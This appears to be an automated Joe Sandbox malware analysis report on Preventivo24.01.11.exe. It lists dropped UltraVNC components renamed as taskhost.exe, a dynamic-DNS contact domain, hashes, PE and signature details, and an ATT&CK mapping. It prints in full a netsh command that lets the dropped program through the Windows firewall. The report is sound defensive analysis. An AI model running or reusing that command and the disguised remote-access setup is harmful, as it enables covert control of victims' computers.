Code function: 0_2_01002440 GetUserNameW,GetLastError,GetUserNameW,GetEnvironmentVariableW,GetEnvironmentVariableW,RegDeleteValueW,RegCloseKey,RegQueryInfoKeyW,RegCloseKey,RegCloseKey,RegDeleteKeyW,RegCloseKey,RegDeleteValueW,RegCloseKey,

Source: C:\Games\viewer.exe

Code function: 6_2_00648AB4 _free,GetTimeZoneInformation,

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00E87AA0 GetVersionExW,GetVersionExW,IsProcessorFeaturePresent,

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the windows firewall

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL

Remote Access Functionality

Contains VNC / remote desktop functionality (version string found)

Source: taskhost.exe, 00000029.00000002.3497479719.0000000003A6D000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: RFB 003.008
Source: taskhost.exe, 00000029.00000002.3496512970.000000000114E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: RFB 003.008

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
1 Spearphishing Link	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	21 Disable or Modify Tools	OS Credential Dumping	2 System Time Discovery	1 Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Other Network Medium	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	1 System Shutdown/Reboot	Acquire Infrastructure	Gather Victim Identity Information
1 Valid Accounts	3 Native API	1 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Peripheral Device Discovery	1 Replication Through Removable Media	Data from Removable Media	Exfiltration Over Bluetooth	11 Encrypted Channel	SIM Card Swap	Obtain Device Cloud Backups	1 Defacement	Domains	Credentials
1 Replication Through Removable Media	112 Command and Scripting Interpreter	1 Bootkit	1 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Standard Port			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	Cron	Login Hook	1 Access Token Manipulation	1 Timestomp	NTDS	5 File and Directory Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	1 Remote Access Software			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	Launchd	Network Logon Script	13 Process Injection	1 DLL Side-Loading	LSA Secrets	37 System Information Discovery	SSH	Keylogging	Scheduled Transfer	3 Non-Application Layer Protocol			Data Encrypted for Impact	Server	Gather Victim Network Information
Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Query Registry	VNC	GUI Input Capture	Data Transfer Size Limits	14 Application Layer Protocol			Service Stop	Botnet	Domain Properties
External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Valid Accounts	DCSync	41 Security Software Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over C2 Channel	Commonly Used Port			Inhibit System Recovery	Web Services	DNS
Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Exfiltration Over Alternative Protocol	Application Layer Protocol			Defacement	Serverless	Network Trust Dependencies
Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	3 Process Discovery	Direct Cloud VM Connections	Data Staged	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Web Protocols			Internal Defacement	Malvertising	Network Topology
Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	1 Application Window Discovery	Shared Webroot	Local Data Staging	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	File Transfer Protocols			External Defacement	Compromise Infrastructure	IP Addresses
Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	13 Process Injection	Input Capture	1 System Owner/User Discovery	Software Deployment Tools	Remote Data Staging	Exfiltration Over Unencrypted Non-C2 Protocol	Mail Protocols			Firmware Corruption	Domains	Network Security Appliances
Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Bootkit	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	Exfiltration Over Physical Medium	DNS			Resource Hijacking	DNS Server	Gather Victim Org Information

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Preventivo24.01.11.exe	8%	ReversingLabs
Preventivo24.01.11.exe	17%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\MSI6F00.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI6FDC.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI6FFC.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\shi6E82.tmp	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\taskhost.exe	8%	ReversingLabs
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\viewer.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
https://forum.uvnc.comvncMenu::WndProc	0%	Avira URL Cloud	safe
http://html4/loose.dtd	0%	Avira URL Cloud	safe
https://www.uvnc.comhttps://forum.uvnc.comnet	0%	Avira URL Cloud	safe
http://.jpg	0%	Avira URL Cloud	safe
http://.css	0%	Avira URL Cloud	safe
https://www.uvnc.comcmd	0%	Avira URL Cloud	safe
http://java.sun.com/products/plugin/index.html#download	0%	Avira URL Cloud	safe
http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.example.com	93.184.216.34	true	false		high
vnvariant2024.ddnsfree.com	140.228.29.110	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.example.com/download/updates.txt	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://html4/loose.dtd	shi6E82.tmp.0.dr	false	Avira URL Cloud: safe	low
http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0A6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000000.1860708223.0000000000203000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	false	URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	false	URL Reputation: safe	unknown
http://ocsp.thawte.com0	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr	false	URL Reputation: safe	unknown
http://www.pdf-tools.com	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ~.pdf.0.dr	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	false	URL Reputation: safe	unknown
https://www.uvnc.com	taskhost.exe.0.dr	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	false	URL Reputation: safe	unknown
http://.css	shi6E82.tmp.0.dr	false	Avira URL Cloud: safe	low
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	false	URL Reputation: safe	unknown
https://forum.uvnc.com	taskhost.exe.0.dr	false		high
https://www.uvnc.comcmd	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	false	URL Reputation: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr	false		high
https://www.thawte.com/cps0/	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	false		high
https://forum.uvnc.comvncMenu::WndProc	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	false	Avira URL Cloud: safe	low
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	false	URL Reputation: safe	unknown
https://www.thawte.com/repository0W	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	false		high
https://www.advancedinstaller.com	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	false		high
https://www.uvnc.comhttps://forum.uvnc.comnet	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://java.sun.com/products/plugin/index.html#download	Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0A6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000000.1860708223.0000000000203000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://.jpg	shi6E82.tmp.0.dr	false	Avira URL Cloud: safe	low

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
52.202.204.11	unknown	United States	14618	AMAZON-AESUS	false
93.184.216.34	www.example.com	European Union	15133	EDGECASTUS	false
23.54.200.159	unknown	United States	16625	AKAMAI-ASUS	false
140.228.29.110	vnvariant2024.ddnsfree.com	United States	600	OARNET-ASUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	38.0.0 Ammolite
Analysis ID:	1379424
Start date and time:	2024-01-23 12:17:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 54s
Hypervisor based Inspection enabled:	false
Report type:	light
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	59
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Preventivo24.01.11.exe
Detection:	MAL
Classification:	mal76.rans.troj.evad.winEXE@110/77@8/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 60% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
TCP Packets have been reduced to 100
Excluded IPs from analysis (whitelisted): 72.21.81.240, 23.63.204.182, 172.64.41.3, 162.159.61.3, 23.55.62.18, 23.55.62.67, 23.47.204.60, 23.47.204.78, 23.47.204.62, 23.47.204.51, 23.47.204.71, 23.47.204.8, 23.47.204.33, 23.34.82.78, 23.34.82.70
Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, geo2.adobe.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	10
Entropy (8bit):	2.9219280948873623
Encrypted:	false
SSDEEP:	3:DdWcw:Bbw
MD5:	EF303119CD5A401423EFE69D77275604
SHA1:	0D2534C78AE7A1FD9CC5FF0DDED77800B171F787
SHA-256:	F1A65F2D0644D187AFD37F75EDC06E25D412C3A6218619A39101C2A5CDCB61EA
SHA-512:	CAA5CA40AEAD79316B20A3F6977B255D2677F7472642579D405A945137E3B7F9661C655510D6A6761E046910335E3953C40BF3AD77671EAF237895A7B03F718C
Malicious:	false
Preview:	5383948 ..

Process:	C:\Games\taskhost.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1421
Entropy (8bit):	4.919536877398004
Encrypted:	false
SSDEEP:	24:y38ApvI/dg3KtcJaAwp+Sjh31Nemb31NemnGRyQEgshgOZbHNDuwOZxD//P33k34:y3LFI/dg3XJaAwp+Sj7txtG8kshgMb5i
MD5:	6EF42238183882749CCFD368788B3A3C
SHA1:	E33154329DD1916C0F605B115F0BE7A77BFF6EA7
SHA-256:	DF25EFF50326E1DDF0A3489EA946A392902E6207ECA623E88A7BF4456BDF78B0
SHA-512:	632DA8709411633142BF496AD76E4DC833FD5D41DA903CC27A15E2D00F5D03403E0BD81BC150FEC000B560DC78E472DCC2276F207957629D90B8EEDE8CA67675
Malicious:	false
Preview:	Tue Jan 23 12:18:21 2024.WinVNCAppMain : WinVNCAPPMain-----Application started.WinVNCAppMain : server created ok.imp_desktop_thread : OpenInputdesktop OK.imp_desktop_thread : SelectHDESK to Default (370) from 11c.imp_desktop_thread : Username user .vncMenu::vncMenu : vncmenu(server).Tue Jan 23 12:18:22 2024.vncServer::SetAuthHosts : authhosts cleared.vncServer::EnableConnections : SockConnect 0.vncServer::EnableConnections : SockConnect 1.vncServer::EnableConnections : trying port number 5900.Tue Jan 23 12:18:24 2024.VSocket::Close : closing socket.vncServer::EnableConnections : SockConnect Done 1.vncServer::EnableConnections : SockConnect 1.vncServer::EnableConnections : SockConnect 1.vncSockConnectThread::run_undetached : started socket connection thread.vncHTTPConnectThread::run_undetached : started HTTP server thread.imp_desktop_thread : PostAddNewClient IIIII.Tue Jan 23 12:18:25 2024.vncServer::AutoConnectRetry : AutoConnectRetry(): started.vncServer::actualRetryThread : Attempt

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.252775680408843
Encrypted:	false
SSDEEP:	6:HMWpPUM8Q+q2Pwkn2nKuAl9OmbnIFUt8+MWpPUMmbQgZmw++MWpPUMm8uDQdSQVW:H5PP8VvYfHAahFUt8+5PPOQg/++5PP1w
MD5:	60425B4FF8C1C1A6F2D0092A7F15EF6F
SHA1:	662F7165E9DCE1C85B5F6C60853F13E5E9658325
SHA-256:	9D98E231F4FBCA538ACE193C53EF5A47A733EECB05FA83DA1A009FE2E61B52AC
SHA-512:	CCCC61F24A9C032BBE9A5A44286BF8FBB8FF5077C367AC9B89636408F56BEEF62B7D3F92C8209757EFD7753B617F6AECAC6CAC5681B25990F686B416510BF88F
Malicious:	false
Preview:	2024/01/23-12:18:09.699 1f58 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/01/23-12:18:09.702 1f58 Recovering log #3.2024/01/23-12:18:09.703 1f58 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 66791 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	66791
Entropy (8bit):	7.995531727155867
Encrypted:	true
SSDEEP:	1536:drFvD2YSE/sFDqV0FJJynkAhftCvMd3coa282frgW1qgNzU:drVDJSeaDqV0FJwLhVkr282fF5U
MD5:	AC05D27423A85ADC1622C714F2CB6184
SHA1:	B0FE2B1ABDDB97837EA0195BE70AB2FF14D43198
SHA-256:	C6456E12E5E53287A547AF4103E0397CB9697E466CF75844312DC296D43D144D
SHA-512:	6D0EF9050E41FBAE680E0E59DD0F90B6AC7FEA5579EF5708B69D5DA33A0ECE7E8B16574B58B17B64A34CC34A4FFC22B4A62C1ECE61F36C4A11A0665E0536B90D
Malicious:	false
Preview:	MSCF............,...................I.................gW.e .authroot.stl..u/1.5..CK..<Tk...p.k:..c.Y:.(Qc...%Y.f_...$..DHn..6i/.]....-!QQ..}f..f...}..1....9.......pN..mI.a.....!...N.....xP.f6..C.'#.c.@GN(3.<3.......9...('3...l.l....B..x..e...UWFU.TT.l.L...._.l1......w.\..Xb.v..Q......pKP.....M`.Y......Op4=.(=P.e...p.(U.....z7MF..O......V2.....#...pj...z.!...wQ...V&.Gz..Nv.4..y(J...A..':.2Q.^u.y..<.1..2..o........H.D.S.....62.\| w(...B.......h.QZ..'....l.<....6..Z...p?... .pT.......l..S..K....FT?.....p..`.&..y..."T=l.n..egf.w..X.Y...G.m....=.}cO.7.....9....o..:.Y=.-.5....ud.J&.]..Q..._<.S....{a.=.n...PT.Um).\| kpyA....h.PXY.>.......^2U...H.....V<\...k..~....H..p...8..'..?...r>.4..!u......1\.`.<.+..n..p..]...).....L.g....#.<..c]R.U."\i.Z.>...`Q..g6....0.......F.........N.s.Z..A........m.^....a_..>v.-.mk...wt.n.:...>S..;....1...j.+m.&S......$.T...i.B=h.n...c.!e.....Y.#..bw.}...d.. ..w... .&..w.9..}k...\...=....{q.Up..y;..7.-.K.'.....

Process:	C:\Windows\SysWOW64\wbem\WMIC.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	28
Entropy (8bit):	4.208966082694623
Encrypted:	false
SSDEEP:	3:nLWGWNI3ov:nyGWNOov
MD5:	F2CE4C29DC78D5906090690C345EAF80
SHA1:	D12E3B86380F0DBEF4FBDFFE2CBFE2144FB7E9CD
SHA-256:	0356A869FC7E6495BAC33303B002935C317166D0EA5D403BE162573CF01055D8
SHA-512:	51F939C41710BC3A4E443CDAF33AAE614B043ACC2382A0C836049E34D2F51C8195FD149548752B33E4EDD4299548BB1957B89997FC640C837C9400D76FEA5B74
Malicious:	false
Preview:	No Instance(s) Available....

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.141133782753418
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Preventivo24.01.11.exe
File size:	5'955'744 bytes
MD5:	32f35b78a3dc5949ce3c99f2981def6b
SHA1:	18a24aa0ac052d31fc5b56f5c0187041174ffc61
SHA256:	0cb44c4f8273750fa40497fca81e850f73927e70b13c8f80cdcfee9d1478e6f3
SHA512:	e14962926f7544f894b84b3091b884b2f9b54c8b40e44e55c43b2df112d68555ddfca268353e278651cc7994011e456ac4515f1b7f0787e499f19dbd75d95cb5
SSDEEP:	98304:7azvMgOJRWT7tRyYsQdTEDdoJr7dJDqpbhUwkasM+u1JfJXibUPHI:7azvMgOJRWT7ukTE5oNqZX1WUA
TLSH:	0C569D30B15AC62ED56241F1192CDAAB911D6D3A0F6190DBB3DC7E6F2BB04C35236E27
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ul..1...1...1...............0...7...%...7...(...7...\.......=.......*.......8.......0...1.......\.......\.l.0...1...0...\...0..

Entrypoint:	0x60b100
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6582CD64 [Wed Dec 20 11:17:56 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	36aca8edddb161c588fcf5afdc1ad9fa

Signature Valid:	false
Signature Issuer:	CN=CodeSigningCert
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	28/02/2023 11:15:47 28/02/2025 11:25:47
Subject Chain	CN=CodeSigningCert
Version:	3
Thumbprint MD5:	5082070071D2E70CFB8AF6145E2E0DAD
Thumbprint SHA-1:	A1846ABF798522A5B115A90F5C3283CE050626F2
Thumbprint SHA-256:	0C21B06B3EDE50F24284DDB567B4370193279F3E59A9A1BB602D9A9C230B4D28
Serial:	12E79E88324CCEA94E0358CCB4A75075

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x349108	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x359000	0x56a58	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x5adb10	0x590
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3b0000	0x2d550	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2eb4b0	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x2eb540	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2bcb50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x297000	0x320	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3463bc	0x260	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x295bca	0x295c00	9df1023178e489408abd4de59ea6f5ec	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x297000	0xb3362	0xb3400	1a85f2a6b8a9c3902456bab47389e1fe	False	0.32838378225244075	data	5.079377208024134	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x34b000	0xcc00	0x3400	97e28501cab3e5e33657a71481a58ba7	False	0.23963341346153846	data	4.542379696709195	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x358000	0x710	0x800	1b38fc929380aabe59305fcde2681d14	False	0.40966796875	data	4.5338796899883915	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x359000	0x56a58	0x56c00	41897894c7d6aefff121b66fdd927208	False	0.11699049891930836	data	4.274410528854854	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x3b0000	0x2d550	0x2d600	b8dcb36c465b4630e3506c3a7521632f	False	0.4789568267906336	data	6.568383422414792	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x3598e0	0x13e	Device independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 5 important colors	English	United States	0.25471698113207547
RT_BITMAP	0x359a20	0x828	Device independent bitmap graphic, 32 x 16 x 32, image size 0	English	United States	0.03017241379310345
RT_BITMAP	0x35a248	0x48a8	Device independent bitmap graphic, 290 x 16 x 32, image size 0	English	United States	0.11881720430107527
RT_BITMAP	0x35eaf0	0xa6a	Device independent bitmap graphic, 320 x 16 x 4, image size 2562, resolution 2834 x 2834 px/m	English	United States	0.21680420105026257
RT_BITMAP	0x35f55c	0x152	Device independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 10 important colors	English	United States	0.5295857988165681
RT_BITMAP	0x35f6b0	0x828	Device independent bitmap graphic, 32 x 16 x 32, image size 0	English	United States	0.4875478927203065
